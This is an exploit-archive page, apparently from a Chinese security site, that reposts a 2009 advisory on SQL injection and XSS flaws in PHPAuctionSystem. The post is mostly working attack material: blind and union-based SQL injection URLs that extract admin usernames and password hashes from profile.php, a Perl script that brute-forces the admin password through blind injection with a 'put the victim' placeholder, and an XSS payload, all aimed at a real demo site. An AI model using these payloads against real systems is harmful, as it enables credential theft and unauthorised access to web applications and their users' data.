首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PHPAuctionSystem (XSS/SQL) Multiple Remote Vulnerabilities 来源：andry2000@hotmail.it 作者：x0r 发布时间：2009-01-06   ######################### #PHPAuctionSystem# ######################### Author:x0r Email:andry2000@hotmail.it Cms:PhpAuctionSystemvnew Cmsprice:$59.99 Demo:http://www.phpauctions.info/demo/ ########################## BugIn:\profile.php(Blind\Normal Sql Injection) Exploit(Blind): profile.php?user_id=29%20and%20substring(@@version,1,1)=5-- profile.php?user_id=29%20and%20substring(@@version,1,1)=4-- profile.php?user_id=29and+1=0-- profile.php?user_id=29and+1=1-- Perl Exploit: #!/usr/bin/perl -w       use strict;       use LWP::Simple;       my $a;   my $host = "http://www.phpauctions.info/demo/profile.php?user_id="; #Put the victim i've used the demo       my @chars = (48..57, 97..102);       for my $i(1..32) {          foreach my $ord(@chars) {                 $a = get($host."1+and+ascii(substring((select+password+from+PHPAUCTION_adminusers+where+id=10),$i,1))=$ord--");                 if($a =~ /coucou/i) {#put the username of the user_id=[id]            syswrite(STDOUT,chr($ord));            $i++;            last;           }         }       } Sql Injection: profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers-- Exploit(XSS):profile.php?user_id=29&auction_id=9[XssCode] LiveDemo:http://www.phpauctions.info/demo/profile.php?user_id=29and substring(@@version,1,1)=4--[False] http://www.phpauctions.info/demo/profile.php?user_id=29and substring(@@version,1,1)=5--[True] LiveDemo(XSS): http://www.phpauctions.info/demo/profile.php?user_id=29&auction_id=9<script>alert(1);</script> Live Demo Sql: http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers-- Greetz:MyGirlfriend...   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·VUPlayer 2.49 (.wax File) Loca ·Safari (Arguments) Array Integ ·Joomla com_phocadocumentation ·Oracle 10g SYS.LT.REMOVEWORKSP ·oomla com_na_newsdescription ( ·Oracle 10g SYS.LT.MERGEWORKSPA ·Cybershade CMS 0.2b (index.php ·Oracle 10g SYS.LT.COMPRESSWORK ·Joomla Component simple_review ·RiotPix <= 0.61 (forumid) Blin ·The Rat CMS Alpha 2 (viewartic ·Debian GNU/Linux XTERM (DECRQS   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved